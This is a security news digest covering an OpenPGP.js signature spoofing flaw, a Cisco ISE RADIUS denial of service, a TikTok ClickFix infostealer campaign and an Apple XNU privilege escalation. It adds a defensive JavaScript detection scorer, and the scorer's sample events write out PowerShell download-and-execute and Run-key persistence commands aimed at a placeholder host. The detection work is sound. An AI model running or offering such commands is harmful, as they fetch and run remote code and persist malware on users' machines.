OpenPGP.js Flaw (CVE-2025-47934): Critical Signature Spoofing Vulnerability in JavaScript Encryption Library
A critical flaw in OpenPGP.js, a widely used JavaScript implementation of OpenPGP that underpins a number of encrypted-email tools, could let an attacker spoof digital signatures so that tampered messages appear authentic. Tracked as CVE-2025-47934, the vulnerability affects the 5.x and 6.x release lines and has now been patched. Browser extensions and server applications that rely on OpenPGP.js to verify message integrity are exposed, including FlowCrypt, PGP Anywhere, and Passbolt. The project has released fixed versions, 5.11.3 and 6.1.1, and users are urged to update or apply the published workarounds immediately.

The flaw lies in how the library reports signature checks during message verification and decryption. An attacker who has obtained any valid signature can pair it with modified or unrelated content, and the library will report the whole message as validly signed even though the attached content was never signed. This works for both inline-signed and signed-and-encrypted messages. The result is a break in the trust model behind digital signatures: false information passes as verified. Any system that depends on OpenPGP.js to authenticate communications should treat updating as urgent, since only the fixed versions restore correct signature validation.
Cisco ISE 3.4 Vulnerability (CVE Pending): Unauthenticated RADIUS DoS Flaw Threatens Network Access Control
Cisco has issued an alert for a serious vulnerability in Identity Services Engine (ISE) version 3.4 that could allow a remote, unauthenticated attacker to cause a denial-of-service (DoS) condition. The flaw stems from improper validation of RADIUS authentication requests, the protocol most Cisco ISE deployments use to control network access. An attacker can exploit it by sending crafted authentication packets through any network access device (NAD) configured to use ISE for AAA (authentication, authorization, and accounting). When ISE processes the malformed request, the instance reloads unexpectedly, cutting off authentication services and disrupting access control across the environment. Because no credentials or elevated privileges are required, this is a low-complexity, high-impact threat for any enterprise network where ISE is deployed.

Only Cisco ISE version 3.4 is affected; Cisco has confirmed that all earlier releases are not. The flaw is reachable only in deployments with RADIUS authentication enabled, which is a concern because RADIUS is active by default in a standard configuration. Organizations that use ISE exclusively for TACACS+ are not exposed to this vector. Cisco has fixed the issue in the newly released 3.4 Patch 1 (3.4P1), and affected users are urged to update immediately, as there are no workarounds or mitigations short of patching. Cisco's Product Security Incident Response Team (PSIRT) reports no evidence of active exploitation at this time, which leaves a brief window for proactive remediation. Enterprises that rely on ISE for critical access control should prioritize this update and review exposure across all authentication touchpoints to head off outages or targeted disruption by opportunistic threat actors.
UPDATE: TikTok ClickFix Campaign: Info-Stealing Malware Spread Through AI-Generated Videos
Cybercriminals are using TikTok to spread the Vidar and StealC information stealers by tricking viewers into running fake "activation" commands, a social-engineering tactic known as ClickFix. The videos, often generated with AI, claim to unlock premium features in popular software such as Windows, Microsoft Office, CapCut, and Spotify. Viewers are told to run a PowerShell command that downloads a script from an attacker-controlled site and installs the malware. One video promising to "boost your Spotify experience" has already reached half a million views, which shows how quickly the campaign is spreading.

The chain works in two stages: the first script downloads and launches the malware as a hidden process, then pulls in a second script that establishes persistence so the malware runs every time the system starts. Once running, Vidar and StealC harvest login credentials, browser data, cryptocurrency wallets, and even 2FA tokens, targeting web browsers, desktop files, and authentication apps. TikTok's recommendation algorithm amplifies the threat by pushing the malicious videos to large audiences quickly. ClickFix lures are not new, but they have become more dangerous as attackers combine AI-generated content with social platforms for wider reach. Similar lures have also appeared in espionage campaigns attributed to nation-state actors, underscoring how versatile and damaging the technique is.
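As an added example (not part of the original report), the scorer below runs over PowerShell command lines or Script Block Logging text (Windows Event ID 4104) and flags the chain described above: a remote fetch piped into Invoke-Expression, a hidden window, execution-policy bypass, and persistence through the Run key or Startup folder. The indicators are heuristics a detection engineer would tune further, not a complete rule set, and the three sample events are constructed, with a reserved `.invalid` placeholder domain in place of any real ClickFix host.

```javascript
// Added example, not from the original report: heuristic scoring of PowerShell
// script-block text for the ClickFix chain (fetch -> iex, hidden window,
// persistence). Indicators and sample events are constructed for illustration.

const FETCH = '(irm|iwr|invoke-(restmethod|webrequest)|downloadstring)';
const EXEC = '(\\biex\\b|invoke-expression)';

const INDICATORS = [
  // Stage 1: remote content fed into Invoke-Expression, in either order.
  { name: 'remote-fetch-to-iex', weight: 5,
    re: new RegExp(`${FETCH}[\\s\\S]{0,200}${EXEC}|${EXEC}[\\s\\S]{0,200}${FETCH}`, 'i') },
  // Hidden console and policy bypass are typical of the relaunch command.
  { name: 'hidden-window', weight: 2, re: /-w(indowstyle)?\s+hidden/i },
  { name: 'bypass-policy', weight: 2, re: /-(ep|executionpolicy)\s+bypass/i },
  // Base64-encoded command of non-trivial length.
  { name: 'encoded-command', weight: 2, re: /-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}/i },
  // Stage 2: persistence so the stealer runs at every logon.
  { name: 'run-key-persistence', weight: 3, re: /currentversion\\run\b/i },
  { name: 'startup-folder', weight: 3, re: /\\start menu\\programs\\startup/i },
];

// Score one script block; "suspicious" means at least one strong indicator
// (the fetch-to-iex pattern alone is enough) or several weak ones together.
function scoreScriptBlock(text) {
  const matched = INDICATORS.filter(i => i.re.test(text));
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  return { score, hits: matched.map(i => i.name), suspicious: score >= 5 };
}

// Constructed sample events (placeholder domain, not a real campaign host).
const SAMPLE_EVENTS = [
  // Stage-1 ClickFix command of the kind shown in a fake "activation" video.
  'iex (irm https://example.invalid/spotify)',
  // Stage-2 persistence: hidden relaunch registered under the Run key.
  'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" -Name Updater -Value "powershell -w hidden -ep bypass -c iex (irm https://example.invalid/u)"',
  // Benign administration, should score zero.
  'Get-ChildItem C:\\Windows\\System32 | Where-Object Length -gt 1MB',
];

// Triage a batch of events and attach the score and matched indicators to each.
function triage(events = SAMPLE_EVENTS) {
  return events.map(event => ({ event, ...scoreScriptBlock(event) }));
}

for (const r of triage()) {
  console.log(`${r.suspicious ? 'ALERT' : 'ok   '} score=${r.score} hits=${r.hits.join(',')} :: ${r.event}`);
}
```

In practice the same scorer can be fed from Sysmon process-creation events (command lines) as well as 4104 script blocks; the fetch-to-iex pattern is the highest-value indicator because legitimate administration almost never pipes freshly downloaded text straight into the interpreter.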
UPDATE: Apple XNU Kernel Flaw (CVE-2025-31219): Local Privilege Escalation Risk Across All Apple Platforms
Apple has patched a high-severity vulnerability in its XNU kernel that could allow an attacker to take full control of devices running macOS, iOS, iPadOS, tvOS, watchOS, and visionOS. The flaw, CVE-2025-31219, lets a local attacker escalate from ordinary user access to kernel-level privileges, opening the door to a complete system takeover, including access to sensitive data and critical system functions. Apple has shipped updates for all supported versions of these platforms, and users are strongly advised to install them without delay.

The issue is tied to how the XNU kernel manages virtual memory operations. Missing locks around certain memory accesses create a race condition; an attacker who wins the race can interfere with kernel state at the right moment to corrupt memory or gain elevated access. The flaw requires no user interaction and no unusual preconditions, only the ability to run code locally with low privileges. Once triggered, it allows changes far beyond the attacking process, giving deep control over the entire system. Apple's fix adds the missing locking, but unpatched systems remain exposed, and kernel race conditions of this kind are a staple of local privilege-escalation chains. Security teams should prioritize patching and watch for unusual activity that might indicate exploitation attempts.